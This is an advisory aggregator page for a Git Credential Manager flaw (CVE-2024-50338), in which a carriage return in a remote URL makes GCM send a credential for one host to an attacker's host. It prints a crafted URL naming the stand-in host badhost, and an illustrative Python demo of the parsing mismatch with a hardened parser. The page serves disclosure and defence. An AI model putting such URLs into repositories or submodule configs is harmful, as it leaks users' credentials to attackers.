Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS04NmMyLTR4NTctd2M4Z84ABDXE

Git Credential Manager carriage-return character in remote URL allows malicious repository to leak credentials

Description

The Git credential protocol is text-based over standard input/output and consists of a series of lines of key-value pairs in the format key=value. Git's documentation forbids the NUL (\0) character and newlines from forming part of the keys[^1] or values.

When Git reads from standard input, it considers both LF and CRLF[^2] as newline characters for the credential protocol by virtue of calling strbuf_getline, which in turn calls strbuf_getdelim_strip_crlf. Git also validates that a newline is not present in the value by checking for the presence of the line-feed character (LF, \n), and errors if one is found. This check catches both LF and CRLF-style newlines, but not a lone CR.

Git Credential Manager uses the .NET standard library StreamReader class to read the standard input stream line-by-line and parse the key=value credential protocol format. The implementation of the ReadLineAsync method considers LF, CRLF, and CR as valid line endings. This means that .NET treats a single CR as a valid newline character, whereas Git does not.

This mismatch of newline treatment between Git and GCM means that an attacker can craft a malicious remote URL such as:

https://\rhost=targethost@badhost

...which will be interpreted by Git as:

protocol=https
host=badhost
username=\rhost=targethost

This will instead be parsed by GCM as if the following has been passed by Git:

protocol=https
host=badhost
username=
host=targethost

This results in the host field being resolved to the targethost value. GCM will then return a credential for targethost to Git, which will then send this credential to the badhost host.
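As an added illustration (not code from Git or GCM, and not a description of the actual patch), the following Python applies the two line-splitting rules described above to the constructed request from this advisory, shows how each side resolves the host field, and adds a hardened parser that splits the way Git does and then refuses any key or value containing CR, LF or NUL. The request string and all function names are constructed for this example.

```python
import re

# Constructed request: the three lines the advisory says Git sends for the
# URL https://\rhost=targethost@badhost, terminated by a blank line.
CONSTRUCTED_REQUEST = "protocol=https\nhost=badhost\nusername=\rhost=targethost\n\n"


def git_lines(data):
    """Git-style (strbuf_getline): only LF ends a line; a CR directly before it is stripped."""
    return [ln[:-1] if ln.endswith("\r") else ln for ln in data.split("\n")]


def dotnet_lines(data):
    """StreamReader.ReadLine-style: LF, CRLF and a lone CR all end a line."""
    return re.split(r"\r\n|\r|\n", data)


def parse(lines):
    """Naive key=value parser: a repeated key overwrites the earlier value."""
    fields = {}
    for ln in lines:
        if ln == "":          # blank line terminates the request
            break
        key, sep, value = ln.partition("=")
        if sep:
            fields[key] = value
    return fields


def parse_hardened(data):
    """Split like Git, then reject any field carrying a control character,
    so one record can never be re-split into an extra host= line."""
    fields = {}
    for ln in git_lines(data):
        if ln == "":
            break
        key, sep, value = ln.partition("=")
        if not sep:
            raise ValueError(f"malformed line: {ln!r}")
        if any(c in key or c in value for c in "\r\n\0"):
            raise ValueError(f"control character in field {key!r}")
        fields[key] = value
    return fields


def demo():
    """Return (host as Git sees it, host as a CR-splitting reader sees it, hardened verdict)."""
    git_host = parse(git_lines(CONSTRUCTED_REQUEST))["host"]
    cr_host = parse(dotnet_lines(CONSTRUCTED_REQUEST))["host"]
    try:
        parse_hardened(CONSTRUCTED_REQUEST)
        verdict = "accepted"
    except ValueError as exc:
        verdict = f"rejected: {exc}"
    return git_host, cr_host, verdict
```

A benign CRLF-terminated request still passes parse_hardened, because the trailing CR is stripped before the control-character check runs.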

Impact

When a user clones or otherwise interacts[^3] with a malicious repository that requires authentication, the attacker can capture credentials for another Git remote. The risk is heightened when cloning repositories with submodules using the --recursive clone option, because the user has no opportunity to inspect the submodule remote URLs beforehand.

Patches

https://github.com/git-ecosystem/git-credential-manager/compare/749e287571c78a2b61f926ccce6a707050871ab8...99e2f7f60e7364fe807e7925f361a81f3c47bd1b

Workarounds

Only interact with trusted remote repositories, and do not clone with --recursive, so that any submodule URLs can be inspected before those submodules are cloned.

Fixed versions

This issue is fixed as of version 2.6.1.

[^1]: The = character is also forbidden to form part of the key.
[^2]: Carriage-return character (CR, \r), followed by a line-feed character.
[^3]: Any remote operation such as fetch, ls-remote, etc.

Permalink: https://github.com/advisories/GHSA-86c2-4x57-wc8g
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NmMyLTR4NTctd2M4Z84ABDXE
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 3 days ago
Updated: 3 days ago


CVSS Score: 7.4
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

EPSS Percentage: 0.00044
EPSS Percentile: 0.15063

Identifiers: GHSA-86c2-4x57-wc8g, CVE-2024-50338
References: Repository: https://github.com/git-ecosystem/git-credential-manager
Blast Radius: 0.0

Affected Packages

nuget:git-credential-manager
Dependent packages: 1
Dependent repositories: 1
Downloads: 615,436 total
Affected Version Ranges: <= 2.6.0
Fixed in: 2.6.1
All affected versions: 0.1.0, 2.0.866, 2.0.877, 2.0.886, 2.0.931, 2.0.935, 2.1.0, 2.1.1, 2.1.2, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.1, 2.5.1, 2.6.0
All unaffected versions: 2.6.1